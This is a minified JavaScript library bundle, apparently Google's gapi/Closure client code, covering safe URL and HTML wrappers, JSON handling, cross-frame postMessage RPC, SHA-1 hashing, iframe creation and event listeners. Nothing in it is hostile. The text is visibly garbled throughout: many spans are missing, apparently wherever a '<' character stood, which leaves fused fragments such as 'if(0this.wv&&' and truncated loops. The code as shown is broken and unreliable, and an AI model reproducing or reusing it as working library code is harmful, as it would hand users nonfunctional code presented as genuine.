Xc,Uc,Yc;_.Vc=function(){this.$l="";this.vP=Uc};_.Vc.prototype.Bh=!0;_.Vc.prototype.$f=function(){return this.$l};_.Vc.prototype.KA=!0;_.Vc.prototype.ql=function(){return 1};_.Wc=function(a){if(a instanceof _.Vc&&a.constructor===_.Vc&&a.vP===Uc)return a.$l;_.La(a);return"type_error:SafeUrl"};Xc=/^(?:(?:https?|mailto|ftp):|[^:/?#]*(?:[/?#]|$))/i;_.$c=function(a){if(a instanceof _.Vc)return a;a=a.Bh?a.$f():String(a);Xc.test(a)||(a="about:invalid#zClosurez");return Yc(a)}; _.ad=function(a){if(a instanceof _.Vc)return a;a=a.Bh?a.$f():String(a);Xc.test(a)||(a="about:invalid#zClosurez");return Yc(a)};Uc={};Yc=function(a){var b=new _.Vc;b.$l=a;return b};Yc("about:blank"); _.cd=function(){this.cC="";this.uP=_.bd};_.cd.prototype.Bh=!0;_.bd={};_.cd.prototype.$f=function(){return this.cC};_.cd.prototype.Ci=function(a){this.cC=a;return this};_.dd=(new _.cd).Ci("");_.fd=function(){this.bC="";this.tP=_.ed};_.fd.prototype.Bh=!0;_.ed={};_.hd=function(a){a=_.Nc(a);return 0===a.length?gd:(new _.fd).Ci(a)};_.fd.prototype.$f=function(){return this.bC};_.fd.prototype.Ci=function(a){this.bC=a;return this};var gd=(new _.fd).Ci(""); var jd;_.kd=function(){this.$l="";this.sP=jd;this.LG=null};_.kd.prototype.KA=!0;_.kd.prototype.ql=function(){return this.LG};_.kd.prototype.Bh=!0;_.kd.prototype.$f=function(){return this.$l};_.ld=function(a){if(a instanceof _.kd&&a.constructor===_.kd&&a.sP===jd)return a.$l;_.La(a);return"type_error:SafeHtml"};jd={};_.md=function(a,b){return(new _.kd).Ci(a,b)};_.kd.prototype.Ci=function(a,b){this.$l=a;this.LG=b;return this};_.md("",0);_.nd=_.md("",0);_.od=_.md(" ",0); _.pd=function(a,b){b=b instanceof _.Vc?b:_.ad(b);a.href=_.Wc(b)};var vd,yd,Ad;_.sd=function(a){return a?new _.qd(_.rd(a)):rc||(rc=new _.qd)};_.td=function(a,b){return _.v(b)?a.getElementById(b):b}; _.ud=function(a,b,c,d){a=d||a;b=b&&"*"!=b?String(b).toUpperCase():"";if(a.querySelectorAll&&a.querySelector&&(b||c))return a.querySelectorAll(b+(c?"."+c:""));if(c&&a.getElementsByClassName){a=a.getElementsByClassName(c);if(b){d={};for(var e=0,f=0,h;h=a[f];f++)b==h.nodeName&&(d[e++]=h);d.length=e;return d}return a}a=a.getElementsByTagName(b||"*");if(c){d={};for(f=e=0;h=a[f];f++)b=h.className,"function"==typeof b.split&&_.qb(b.split(/\s+/),c)&&(d[e++]=h);d.length=e;return d}return a}; _.wd=function(a,b){_.Eb(b,function(b,d){b&&b.Bh&&(b=b.$f());"style"==d?a.style.cssText=b:"class"==d?a.className=b:"for"==d?a.htmlFor=b:vd.hasOwnProperty(d)?a.setAttribute(vd[d],b):_.uc(d,"aria-")||_.uc(d,"data-")?a.setAttribute(d,b):a[d]=b})};vd={cellpadding:"cellPadding",cellspacing:"cellSpacing",colspan:"colSpan",frameborder:"frameBorder",height:"height",maxlength:"maxLength",nonce:"nonce",role:"role",rowspan:"rowSpan",type:"type",usemap:"useMap",valign:"vAlign",width:"width"}; _.xd=function(a){return a?a.parentWindow||a.defaultView:window};_.zd=function(a,b){var c=String(b[0]),d=b[1];if(!Fc&&d&&(d.name||d.type)){c=["<",c];d.name&&c.push(' name="',_.Cc(d.name),'"');if(d.type){c.push(' type="',_.Cc(d.type),'"');var e={};_.Gb(e,d);delete e.type;d=e}c.push(">");c=c.join("")}c=a.createElement(c);d&&(_.v(d)?c.className=d:_.Ma(d)?c.className=d.join(" "):_.wd(c,d));21/a&&(a="-0"),b[b.length]=String(a);else if(e===Ge)b[b.length]=String(!!Number(a));else{if(e===Fe)return Ke(a.toISOString.call(a),c);if(e===Je&&De(a.length)===Ee){b[b.length]="[";var f=0;for(d=Number(a.length)>>0;f>0;f=e?"\\u"+(e+65536).toString(16).substr(1):32<=e&&65535>=e?d:"\ufffd";b[b.length]='"'}else if("object"===d){b[b.length]="{";d=0;for(f in a)Object.prototype.hasOwnProperty.call(a,f)&&(e=Ke(a[f],c),void 0!==e&&(d++&&(b[b.length]=","),b[b.length]=Ke(f),b[b.length]=":",b[b.length]=e));b[b.length]="}"}else return}return b.join("")}};Le=/[\0-\x07\x0b\x0e-\x1f]/; Me=/^([^"]*"([^\\"]|\\.)*")*[^"]*"([^"\\]|\\.)*[\0-\x1f]/;Ne=/^([^"]*"([^\\"]|\\.)*")*[^"]*"([^"\\]|\\.)*\\[^\\\/"bfnrtu]/;Oe=/^([^"]*"([^\\"]|\\.)*")*[^"]*"([^"\\]|\\.)*\\u([0-9a-fA-F]{0,3}[^0-9a-fA-F])/;Pe=/"([^\0-\x1f\\"]|\\[\\\/"bfnrt]|\\u[0-9a-fA-F]{4})*"/g;Qe=/-?(0|[1-9][0-9]*)(\.[0-9]+)?([eE][-+]?[0-9]+)?/g;Re=/[ \t\n\r]+/g;Se=/[^"]:/;Te=/""/g;Ue=/true|false|null/g;We=/00/;Xe=/[\{]([^0\}]|0[^:])/;Ye=/(^|\[)[,:]|[,:](\]|\}|[,:]|$)/;Ze=/[^\[,:][\[\{]/;$e=/^(\{|\}|\[|\]|,|:|0)+/;af=/\u2028/g; bf=/\u2029/g; cf=function(a){a=String(a);if(Le.test(a)||Me.test(a)||Ne.test(a)||Oe.test(a))return!1;var b=a.replace(Pe,'""');b=b.replace(Qe,"0");b=b.replace(Re,"");if(Se.test(b))return!1;b=b.replace(Te,"0");b=b.replace(Ue,"0");if(We.test(b)||Xe.test(b)||Ye.test(b)||Ze.test(b)||!b||(b=b.replace($e,"")))return!1;a=a.replace(af,"\\u2028").replace(bf,"\\u2029");b=void 0;try{b=Be?[Ce(a)]:eval("(function (var_args) {\n return Array.prototype.slice.call(arguments, 0);\n})(\n"+a+"\n)")}catch(c){return!1}return b&&1=== b.length?b[0]:!1};df=function(){var a=((_.m.document||{}).scripts||[]).length;if((void 0===ze||void 0===Be||Ae!==a)&&-1!==Ae){ze=Be=!1;Ae=-1;try{try{Be=!!_.m.JSON&&'{"a":[3,true,"1970-01-01T00:00:00.000Z"]}'===_.m.JSON.stringify.call(_.m.JSON,{a:[3,!0,new Date(0)],c:function(){}})&&!0===Ce("true")&&3===Ce('[{"a":3}]')[0].a}catch(b){}ze=Be&&!Ce("[00]")&&!Ce('"\u0007"')&&!Ce('"\\0"')&&!Ce('"\\v"')}finally{Ae=a}}};_.ef=function(a){if(-1===Ae)return!1;df();return(ze?Ce:cf)(a)}; _.ff=function(a){if(-1!==Ae)return df(),Be?_.m.JSON.stringify.call(_.m.JSON,a):Ke(a)};gf=!Date.prototype.toISOString||"function"!==typeof Date.prototype.toISOString||"1970-01-01T00:00:00.000Z"!==(new Date(0)).toISOString(); hf=function(){var a=Date.prototype.getUTCFullYear.call(this);return[0>a?"-"+String(1E6-a).substr(1):9999>=a?String(1E4+a).substr(1):"+"+String(1E6+a).substr(1),"-",String(101+Date.prototype.getUTCMonth.call(this)).substr(1),"-",String(100+Date.prototype.getUTCDate.call(this)).substr(1),"T",String(100+Date.prototype.getUTCHours.call(this)).substr(1),":",String(100+Date.prototype.getUTCMinutes.call(this)).substr(1),":",String(100+Date.prototype.getUTCSeconds.call(this)).substr(1),".",String(1E3+Date.prototype.getUTCMilliseconds.call(this)).substr(1), "Z"].join("")};Date.prototype.toISOString=gf?hf:Date.prototype.toISOString; _.w("gadgets.json.stringify",_.ff);_.w("gadgets.json.parse",_.ef); _.Rf=window.gapi&&window.gapi.util||{}; _.Tf=function(a){if(!a)return"";a=a.split("#")[0].split("?")[0];a=a.toLowerCase();0==a.indexOf("//")&&(a=window.location.protocol+a);/^[\w\-]*:\/\//.test(a)||(a=window.location.href);var b=a.substring(a.indexOf("://")+3),c=b.indexOf("/");-1!=c&&(b=b.substring(0,c));a=a.substring(0,a.indexOf("://"));if("http"!==a&&"https"!==a&&"chrome-extension"!==a&&"file"!==a&&"android-app"!==a&&"chrome-search"!==a&&"app"!==a)throw Error("w`"+a);c="";var d=b.indexOf(":");if(-1!=d){var e=b.substring(d+1);b=b.substring(0, d);if("http"===a&&"80"!==e||"https"===a&&"443"!==e)c=":"+e}return a+"://"+b+c}; _.Rf.Qa=function(a){return _.Tf(a)}; var ue;ue=window.console;_.ve=function(a){ue&&ue.log&&ue.log(a)};_.we=function(a){ue&&(ue.error?ue.error(a):ue.log&&ue.log(a))};_.xe=function(){}; _.K=_.K||{}; _.K=_.K||{}; (function(){var a=null;_.K.Hc=function(b){var c="undefined"===typeof b;if(null!==a&&c)return a;var d={};b=b||window.location.href;var e=b.indexOf("?"),f=b.indexOf("#");b=(-1===f?b.substr(e+1):[b.substr(e+1,f-e-1),"&",b.substr(f+1)].join("")).split("&");e=window.decodeURIComponent?window.decodeURIComponent:window.unescape;f=0;for(var h=b.length;f=b.length?b:b.substr(0,512)+"... ("+b.length+" bytes)"));var c=0!==b.indexOf("!_");c||(b=b.substring(2));var d=ci(b);if(!c&&!d){if(!d&&(c=bi(b))){if(this.sD[c])this.sD[c]();else this.QD[c]=1;return}var e=a.origin,f=this.rs.zR;this.gS?_.Nd.setTimeout(function(){f(b,e)},0):f(b,e)}};ai.prototype.Ec=function(a,b){".."===a||this.QD[a]?(b(),delete this.QD[a]):this.sD[a]=b}; var $h=function(a,b,c,d){var e=ci(c)?"":"!_";(0,_.xe)("gapi.rpc.send("+Xh+"): "+(!c||512>=c.length?c:c.substr(0,512)+"... ("+c.length+" bytes)"));a.BK(b,e+c,d)};ai.prototype.vR=function(a,b,c){a.postMessage(b,c)};ai.prototype.send=function(a,b,c){(a=this.rs.aI(this.Ge,a))&&!a.closed&&$h(this,a,b,c)}; var di,ei,fi,gi,hi,ii,ji,ki,Uh,Xh,li,mi,ni,oi,Wh,Yh,qi,ri,wi,xi,zi,Zh,Bi,Ai,si,ti,Ci,Vh,Di,Ei;di=0;ei=[];fi={};gi={};hi=_.K.Hc;ii=hi();ji=ii.rpctoken;ki=ii.parent||_.Od.referrer;Uh=ii.rly;Xh=Uh||(_.Nd!==_.Nd.top||_.Nd.opener)&&_.Nd.name||"..";li=null;mi={};ni=function(){};oi={send:ni,Ec:ni}; Wh=function(a,b){"/"==b.charAt(0)&&(b=b.substring(1),a=_.Nd.top);for(b=b.split("/");b.length;){var c=b.shift();"{"==c.charAt(0)&&"}"==c.charAt(c.length-1)&&(c=c.substring(1,c.length-1));if(".."===c)a=a==a.parent?a.opener:a.parent;else if(".."!==c&&a.frames[c]){if(a=a.frames[c],!("postMessage"in a))throw"Not a window";}else return null}return a};Yh=function(a){return(a=fi[a])&&a.Ek}; qi=function(a){if(a.f in{})return!1;var b=a.t,c=fi[a.r];a=a.origin;return c&&(c.Ek===b||!c.Ek&&!b)&&(a===c.origin||"*"===c.origin)};ri=function(a){var b=a.id.split("/"),c=b[b.length-1],d=a.origin;return function(a){var b=a.origin;return a.f==c&&(d==b||"*"==d)}};_.ui=function(a,b,c){a=si(a);gi[a.name]={Mg:b,Sq:a.Sq,Ao:c||qi};ti()};_.vi=function(a){delete gi[si(a).name]};wi={};xi=function(a,b){(a=wi["_"+a])&&a[1](this)&&a[0].call(this,b)}; zi=function(a){var b=a.c;if(!b)return ni;var c=a.r,d=a.g?"legacy__":"";return function(){var a=[].slice.call(arguments,0);a.unshift(c,d+"__cb",null,b);_.yi.apply(null,a)}};Zh=function(a){li=a};Bi=function(a){mi[a]||(mi[a]=_.Nd.setTimeout(function(){mi[a]=!1;Ai(a)},0))};Ai=function(a){var b=fi[a];if(b&&b.ready){var c=b.fC;for(b.fC=[];c.length;)oi.send(a,_.ff(c.shift()),b.origin)}};si=function(a){return 0===a.indexOf("legacy__")?{name:a.substring(8),Sq:!0}:{name:a,Sq:!1}}; ti=function(){for(var a=_.H("rpc/residenceSec")||60,b=(new Date).getTime()/1E3,c=0,d;d=ei[c];++c){var e=d.im;if(!e||0a)ei.splice(c,1),--c;else{var f=e.s,h=gi[f]||gi["*"];if(h)if(ei.splice(c,1),--c,e.origin=d.origin,d=zi(e),e.callback=d,h.Ao(e)){if("__cb"!==f&&!!h.Sq!=!!e.g)break;e=h.Mg.apply(e,e.a);void 0!==e&&d(e)}else(0,_.xe)("gapi.rpc.rejected("+Xh+"): "+f)}}};Ci=function(a,b,c){ei.push({im:a,origin:b,timestamp:(new Date).getTime()/1E3});c||ti()}; Vh=function(a,b){a=_.ef(a);Ci(a,b,!1)};Di=function(a){for(;a.length;)Ci(a.shift(),this.origin,!0);ti()};Ei=function(a){var b=!1;a=a.split("|");var c=a[0];0<=c.indexOf("/")&&(b=!0);return{id:c,origin:a[1]||"*",UA:b}}; _.Fi=function(a,b,c,d){var e=Ei(a);d&&(_.Nd.frames[e.id]=_.Nd.frames[e.id]||d);a=e.id;if(!fi.hasOwnProperty(a)){c=c||null;d=e.origin;if(".."===a)d=_.Rf.Qa(ki),c=c||ji;else if(!e.UA){var f=_.Od.getElementById(a);f&&(f=f.src,d=_.Rf.Qa(f),c=c||hi(f).rpctoken)}"*"===e.origin&&d||(d=e.origin);fi[a]={Ek:c,fC:[],origin:d,bZ:b,HK:function(){var b=a;fi[b].ready=1;Ai(b)}};oi.Ec(a,fi[a].HK)}return fi[a].HK}; _.yi=function(a,b,c,d){a=a||"..";_.Fi(a);a=a.split("|",1)[0];var e=b,f=[].slice.call(arguments,3),h=c,k=Xh,l=ji,n=fi[a],p=k,q=Ei(a);if(n&&".."!==a){if(q.UA){if(!(l=fi[a].bZ)){l=li?li.substring(1).split("/"):[Xh];p=l.length-1;for(var t=_.Nd.parent;t!==_.Nd.top;){var y=t.parent;if(!p--){for(var u=null,x=y.frames.length,F=0;Fb?null:_.v(a)?a.charAt(b):a[b]};_.Ii=[];_.Ji=[];_.Ki=!1;_.Li=function(a){_.Ii[_.Ii.length]=a;if(_.Ki)for(var b=0;b<_.Ji.length;b++)a((0,_.C)(_.Ji[b].wrap,_.Ji[b]))}; _.Mi=function(a){return function(){return a}}(!0); var Ni,Oi,Ui;Ni=null;Oi=/^[\w+/_-]+[=]{0,2}$/;_.Pi=function(a){if(Error.captureStackTrace)Error.captureStackTrace(this,_.Pi);else{var b=Error().stack;b&&(this.stack=b)}a&&(this.message=String(a))};_.B(_.Pi,Error);_.Pi.prototype.name="CustomError";_.Qi=function(a,b){for(var c in a)if(!(c in b)||a[c]!==b[c])return!1;for(c in b)if(!(c in a))return!1;return!0};_.Ri=function(a){var b={},c;for(c in a)b[c]=a[c];return b}; _.Si=function(a,b){a.src=_.Rc(b);if(null===Ni){a:{if((b=_.m.document.querySelector("script[nonce]"))&&(b=b.nonce||b.getAttribute("nonce"))&&Oi.test(b))break a;b=null}Ni=b||""}(b=Ni)&&a.setAttribute("nonce",b)};_.Ti=function(a){return a};Ui=function(a,b){this.rR=a;this.QY=b;this.wv=0;this.Te=null};Ui.prototype.get=function(){if(0this.wv&&(this.wv++,a.next=this.Te,this.Te=a)}; var Vi,Xi,Yi,Wi;Vi=function(a){_.m.setTimeout(function(){throw a;},0)};_.Zi=function(a){a=Wi(a);!_.Va(_.m.setImmediate)||_.m.Window&&_.m.Window.prototype&&!_.Db("Edge")&&_.m.Window.prototype.setImmediate==_.m.setImmediate?(Xi||(Xi=Yi()),Xi(a)):_.m.setImmediate(a)}; Yi=function(){var a=_.m.MessageChannel;"undefined"===typeof a&&"undefined"!==typeof window&&window.postMessage&&window.addEventListener&&!_.Db("Presto")&&(a=function(){var a=window.document.createElement("IFRAME");a.style.display="none";a.src="";window.document.documentElement.appendChild(a);var b=a.contentWindow;a=b.document;a.open();a.write("");a.close();var c="callImmediate"+Math.random(),d="file:"==b.location.protocol?"*":b.location.protocol+"//"+b.location.host;a=(0,_.C)(function(a){if(("*"== d||a.origin==d)&&a.data==c)this.port1.onmessage()},this);b.addEventListener("message",a,!1);this.port1={};this.port2={postMessage:function(){b.postMessage(c,d)}}});if("undefined"!==typeof a&&!_.Ib()){var b=new a,c={},d=c;b.port1.onmessage=function(){if(_.r(c.next)){c=c.next;var a=c.cb;c.cb=null;a()}};return function(a){d.next={cb:a};d=d.next;b.port2.postMessage(0)}}return"undefined"!==typeof window.document&&"onreadystatechange"in window.document.createElement("SCRIPT")?function(a){var b=window.document.createElement("SCRIPT"); b.onreadystatechange=function(){b.onreadystatechange=null;b.parentNode.removeChild(b);b=null;a();a=null};window.document.documentElement.appendChild(b)}:function(a){_.m.setTimeout(a,0)}};Wi=_.Ti;_.Li(function(a){Wi=a}); var $i=function(){this.Uw=this.Do=null},bj=new Ui(function(){return new aj},function(a){a.reset()});$i.prototype.add=function(a,b){var c=bj.get();c.set(a,b);this.Uw?this.Uw.next=c:this.Do=c;this.Uw=c};$i.prototype.remove=function(){var a=null;this.Do&&(a=this.Do,this.Do=this.Do.next,this.Do||(this.Uw=null),a.next=null);return a};var aj=function(){this.next=this.scope=this.Mg=null};aj.prototype.set=function(a,b){this.Mg=a;this.scope=b;this.next=null}; aj.prototype.reset=function(){this.next=this.scope=this.Mg=null}; var cj,dj,ej,fj,hj;_.gj=function(a,b){cj||dj();ej||(cj(),ej=!0);fj.add(a,b)};dj=function(){if(_.m.Promise&&_.m.Promise.resolve){var a=_.m.Promise.resolve(void 0);cj=function(){a.then(hj)}}else cj=function(){_.Zi(hj)}};ej=!1;fj=new $i;hj=function(){for(var a;a=fj.remove();){try{a.Mg.call(a.scope)}catch(b){Vi(b)}bj.put(a)}ej=!1}; _.ij=function(a){a.prototype.then=a.prototype.then;a.prototype.$goog_Thenable=!0};_.jj=function(a){if(!a)return!1;try{return!!a.$goog_Thenable}catch(b){return!1}};var lj,mj,wj,uj;_.kj=function(a,b){this.Da=0;this.Pi=void 0;this.Tm=this.vj=this.hb=null;this.uu=this.fz=!1;if(a!=_.Ta)try{var c=this;a.call(b,function(a){c.Wg(2,a)},function(a){c.Wg(3,a)})}catch(d){this.Wg(3,d)}};lj=function(){this.next=this.context=this.On=this.gr=this.Uk=null;this.Yo=!1};lj.prototype.reset=function(){this.context=this.On=this.gr=this.Uk=null;this.Yo=!1};mj=new Ui(function(){return new lj},function(a){a.reset()});_.nj=function(a,b,c){var d=mj.get();d.gr=a;d.On=b;d.context=c;return d}; _.oj=function(a){if(a instanceof _.kj)return a;var b=new _.kj(_.Ta);b.Wg(2,a);return b};_.pj=function(a){return new _.kj(function(b,c){c(a)})};_.rj=function(a,b,c){qj(a,b,c,null)||_.gj(_.Gi(b,a))};_.tj=function(){var a,b,c=new _.kj(function(c,e){a=c;b=e});return new sj(c,a,b)};_.kj.prototype.then=function(a,b,c){return uj(this,_.Va(a)?a:null,_.Va(b)?b:null,c)};_.ij(_.kj);_.kj.prototype.JD=function(a,b){return uj(this,null,a,b)}; _.kj.prototype.cancel=function(a){0==this.Da&&_.gj(function(){var b=new vj(a);wj(this,b)},this)};wj=function(a,b){if(0==a.Da)if(a.hb){var c=a.hb;if(c.vj){for(var d=0,e=null,f=null,h=c.vj;h&&(h.Yo||(d++,h.Uk==a&&(e=h),!(e&&1b?e>f?e:f:ee;e++)d[e]=b.charCodeAt(c)<<24|b.charCodeAt(c+1)<<16|b.charCodeAt(c+2)<<8|b.charCodeAt(c+3),c+=4;else for(e=0;16>e;e++)d[e]=b[c]<<24|b[c+1]<<16|b[c+2]<<8|b[c+3],c+=4;for(e=16;80>e;e++){var f=d[e-3]^d[e-8]^d[e-14]^d[e-16];d[e]=(f<<1|f>>>31)&4294967295}b=a.Fc[0];c=a.Fc[1];var h=a.Fc[2],k=a.Fc[3],l=a.Fc[4];for(e=0;80>e;e++){if(40>e)if(20>e){f=k^c&(h^k);var n=1518500249}else f=c^h^k,n=1859775393;else 60>e?(f=c&h|k&(c|h),n=2400959708): (f=c^h^k,n=3395469782);f=(b<<5|b>>>27)+f+l+n+d[e]&4294967295;l=k;k=h;h=(c<<30|c>>>2)&4294967295;c=b;b=f}a.Fc[0]=a.Fc[0]+b&4294967295;a.Fc[1]=a.Fc[1]+c&4294967295;a.Fc[2]=a.Fc[2]+h&4294967295;a.Fc[3]=a.Fc[3]+k&4294967295;a.Fc[4]=a.Fc[4]+l&4294967295}; _.jh.prototype.update=function(a,b){if(null!=a){_.r(b)||(b=a.length);for(var c=b-this.tj,d=0,e=this.Xx,f=this.An;dthis.An?this.update(this.Jv,56-this.An):this.update(this.Jv,this.tj-(this.An-56));for(var c=this.tj-1;56<=c;c--)this.Xx[c]=b&255,b/=256;kh(this,this.Xx);for(c=b=0;5>c;c++)for(var d=24;0<=d;d-=8)a[b]=this.Fc[c]>>d&255,++b;return a}; _.lh=function(){this.rD=new _.jh};_.g=_.lh.prototype;_.g.reset=function(){this.rD.reset()};_.g.NM=function(a){this.rD.update(a)};_.g.KG=function(){return this.rD.digest()};_.g.SD=function(a){a=(0,window.unescape)((0,window.encodeURIComponent)(a));for(var b=[],c=0,d=a.length;c /g;Zj=/"/g;ak=/'/g;bk=function(a){return String(a).replace(Wj,"&").replace(Xj,"<").replace(Yj,">").replace(Zj,""").replace(ak,"'")};ck=/[\ud800-\udbff][\udc00-\udfff]|[^!-~]/g; dk=/%([a-f]|[0-9a-fA-F][a-f])/g;ek=/^(https?|ftp|file|chrome-extension):$/i; fk=function(a){a=String(a);a=a.replace(ck,function(a){try{return(0,window.encodeURIComponent)(a)}catch(f){return(0,window.encodeURIComponent)(a.replace(/^[^%]+$/g,"\ufffd"))}}).replace(_.Zd,function(a){return a.replace(/%/g,"%25")}).replace(dk,function(a){return a.toUpperCase()});a=a.match(_.Yd)||[];var b=_.G(),c=function(a){return a.replace(/\\/g,"%5C").replace(/\^/g,"%5E").replace(/`/g,"%60").replace(/\{/g,"%7B").replace(/\|/g,"%7C").replace(/\}/g,"%7D")},d=!!(a[1]||"").match(ek);b.gp=c((a[1]|| "")+(a[2]||"")+(a[3]||(a[2]&&d?"/":"")));d=function(a){return c(a.replace(/\?/g,"%3F").replace(/#/g,"%23"))};b.query=a[5]?[d(a[5])]:[];b.nh=a[7]?[d(a[7])]:[];return b};gk=function(a){return a.gp+(0++c);_.Vj(5>c,"Error creating iframe id");return d};_.xk=function(a,b){return a?b+"/"+a:""}; _.yk=function(a,b,c,d){var e={},f={};a.documentMode&&9>a.documentMode&&(e.hostiemode=a.documentMode);_.Vd(d.queryParams||{},e);_.Vd(d.fragmentParams||{},f);var h=d.pfname;var k=_.G();_.H("iframes/dropLegacyIdParam")||(k.id=c);k._gfid=c;k.parent=a.location.protocol+"//"+a.location.host;c=_.Xd(a.location.href,"parent");h=h||"";!h&&c&&(h=_.Xd(a.location.href,"_gfid","")||_.Xd(a.location.href,"id",""),h=_.xk(h,_.Xd(a.location.href,"pfname","")));h||(c=_.ef(_.Xd(a.location.href,"jcp","")))&&"object"== typeof c&&(h=_.xk(c.id,c.pfname));k.pfname=h;d.connectWithJsonParam&&(h={},h.jcp=_.ff(k),k=h);h=_.Xd(b,"rpctoken")||e.rpctoken||f.rpctoken;h||(h=d.rpctoken||String(Math.round(1E8*_.Nj())),k.rpctoken=h);d.rpctoken=h;_.Vd(k,d.connectWithQueryParams?e:f);k=a.location.href;a=_.G();(h=_.Xd(k,"_bsh",_.de.bsh))&&(a._bsh=h);(k=_.de.dpo?_.de.h:_.Xd(k,"jsh",_.de.h))&&(a.jsh=k);d.hintInFragment?_.Vd(a,f):_.Vd(a,e);return _.ik(b,e,f,d.paramsSerializer)}; zk=function(a){_.Vj(!a||_.kk.test(a),"Illegal url for new iframe - "+a)}; _.Ak=function(a,b,c,d,e){zk(c.src);var f,h=qk(d,c),k=h?rk(d):"";try{window.document.all&&(f=a.createElement(''))}catch(n){}finally{f||(f=a.createElement("iframe"),h&&(f.onload=function(){f.onload=null;h.call(this)},sk(d)))}f.setAttribute("ng-non-bindable","");for(var l in c)a=c[l],"style"===l&&"object"===typeof a?_.Vd(a,f.style):uk[l]||f.setAttribute(l,String(a));(l=e&& e.beforeNode||null)||e&&e.dontclear||lk(b);b.insertBefore(f,l);f=l?l.previousSibling:b.lastChild;c.allowtransparency&&(f.allowTransparency=!0);return f}; var Bk,Ek;Bk=/^:[\w]+$/;_.Ck=/:([a-zA-Z_]+):/g;_.Dk=function(){var a=_.fh()||"0",b=ok();var c=_.fh(void 0)||a;var d=ok(void 0),e="";c&&(e+="u/"+(0,window.encodeURIComponent)(String(c))+"/");d&&(e+="b/"+(0,window.encodeURIComponent)(String(d))+"/");c=e||null;(e=(d=!1===_.H("isLoggedIn"))?"_/im/":"")&&(c="");var f=_.H("iframes/:socialhost:"),h=_.H("iframes/:im_socialhost:");return Sj={socialhost:f,ctx_socialhost:d?h:f,session_index:a,session_delegate:b,session_prefix:c,im_prefix:e}}; Ek=function(a,b){return _.Dk()[b]||""};_.Fk=function(a){return _.jk(_.Od,a.replace(_.Ck,Ek))};_.Gk=function(a){var b=a;Bk.test(a)&&(b=_.H("iframes/"+b.substring(1)+"/url"),_.Vj(!!b,"Unknown iframe url config for - "+a));return _.Fk(b)}; _.Hk=function(a,b,c){var d=c||{};c=d.attributes||{};_.Vj(!(d.allowPost||d.forcePost)||!c.onload,"onload is not supported by post iframe (allowPost or forcePost)");a=_.Gk(a);c=b.ownerDocument||_.Od;var e=_.wk(c,d);a=_.yk(c,a,e,d);var f=_.G();_.Vd(_.tk,f);_.Vd(d.attributes,f);f.name=f.id=e;f.src=a;d.eurl=a;var h=d||{},k=!!h.allowPost;if(h.forcePost||k&&2E3c;c+=4)b[c/4]=a[c]<<24|a[c+1]<<16|a[c+2]<<8|a[c+3];for(c=16;80>c;c++)a=b[c-3]^b[c-8]^b[c-14]^b[c-16],b[c]=(a<<1|a>>>31)&4294967295;a=e[0];var d=e[1],f=e[2],k=e[3],l=e[4];for(c=0;80>c;c++){if(40>c)if(20>c){var n=k^d&(f^k);var p=1518500249}else n=d^f^k,p=1859775393;else 60>c?(n=d&f|k&(d|f),p=2400959708):(n=d^f^k,p=3395469782);n=((a<<5|a>>>27)&4294967295)+ n+l+p+b[c]&4294967295;l=k;k=f;f=(d<<30|d>>>2)&4294967295;d=a;a=n}e[0]=e[0]+a&4294967295;e[1]=e[1]+d&4294967295;e[2]=e[2]+f&4294967295;e[3]=e[3]+k&4294967295;e[4]=e[4]+l&4294967295}function c(a,c){if("string"===typeof a){a=(0,window.unescape)((0,window.encodeURIComponent)(a));for(var d=[],e=0,h=a.length;en?c(k,56-n):c(k,64-(n-56));for(var h=63;56<=h;h--)f[h]=d&255,d>>>=8;b(f);for(h=d=0;5>h;h++)for(var l=24;0<=l;l-=8)a[d++]=e[h]>>l&255;return a}for(var e=[],f=[],h=[],k=[128],l=1;64>l;++l)k[l]=0;var n,p;a();return{reset:a,update:c,digest:d,Jg:function(){for(var a=d(),b="",c=0;cJ[a]++?window.setTimeout(function(){k(a,b)},500):(U[a]=pa,J[a]=!0):J[a]=!0}}function l(a){(a=F[a])&&"/"===a.substring(0,1)&&(a="/"===a.substring(1,2)?window.document.location.protocol+a:window.document.location.protocol+"//"+window.document.location.host+a);return a}function n(a,b,c){b&&!/http(s)?:\/\/.+/.test(b)&& (0==b.indexOf("//")?b=window.location.protocol+b:"/"==b.charAt(0)?b=window.location.protocol+"//"+window.location.host+b:-1==b.indexOf("://")&&(b=window.location.protocol+"//"+b));F[a]=b;"undefined"!==typeof c&&(z[a]=!!c)}function p(a,b){b=b||"";E[a]=String(b);k(a,b)}function q(a){a=(a.passReferrer||"").split(":",2);ua=a[0]||"none";oa=a[1]||"origin"}function t(b){"true"===String(b.useLegacyProtocol)&&(L=lf.Fu||pa,L.Pb(d,a))}function y(a,b){function c(c){c=c&&c.rpc||{};q(c);var d=c.parentRelayUrl|| "";d=e(V.parent||b)+d;n("..",d,"true"===String(c.useLegacyProtocol));t(c);p("..",a)}!V.parent&&b?c({}):_.ye.register("rpc",null,c)}function u(a,b,c){if(".."===a)y(c||V.rpctoken||V.ifpctok||"",b);else a:{var d=null;if("/"!=a.charAt(0)){if(!_.K)break a;d=window.document.getElementById(a);if(!d)throw Error("q`"+a);}d=d&&d.src;b=b||_.N.Qa(d);n(a,b);b=_.K.Hc(d);p(a,c||b.rpctoken)}}var x={},F={},z={},E={},A=0,M={},J={},V={},U={},qa={},ua=null,oa=null,va=window.top!==window.self,la=window.name,W=function(){}, ab=window.console,ra=ab&&ab.log&&function(a){ab.log(a)}||function(){},pa=function(){function a(a){return function(){ra(a+": call ignored")}}return{uH:function(){return"noop"},zW:function(){return!0},Pb:a("init"),Ec:a("setup"),call:a("call")}}();_.K&&(V=_.K.Hc());var Fa=!1,I=!1,L=function(){if("rmr"==V.rpctx)return lf.cL;var a="function"===typeof window.postMessage?lf.lE:"object"===typeof window.postMessage?lf.lE:window.ActiveXObject?lf.TJ?lf.TJ:lf.Fu:0=a.keyCode)a.keyCode=-1}catch(b){}}; var Lp;_.Jp="closure_listenable_"+(1E6*Math.random()|0);_.Kp=function(a){return!(!a||!a[_.Jp])};Lp=0;var Mp=function(a,b,c,d,e){this.listener=a;this.Sv=null;this.src=b;this.type=c;this.capture=!!d;this.Se=e;this.key=++Lp;this.Vn=this.ht=!1},Np=function(a){a.Vn=!0;a.listener=null;a.Sv=null;a.src=null;a.Se=null};_.Op=function(a){this.src=a;this.sd={};this.ts=0};_.Op.prototype.add=function(a,b,c,d,e){var f=a.toString();a=this.sd[f];a||(a=this.sd[f]=[],this.ts++);var h=Pp(a,b,d,e);-1c.keyCode||void 0!=c.returnValue)){a:{var e=!1;if(0==c.keyCode)try{c.keyCode=-1;break a}catch(h){e=!0}if(e||void 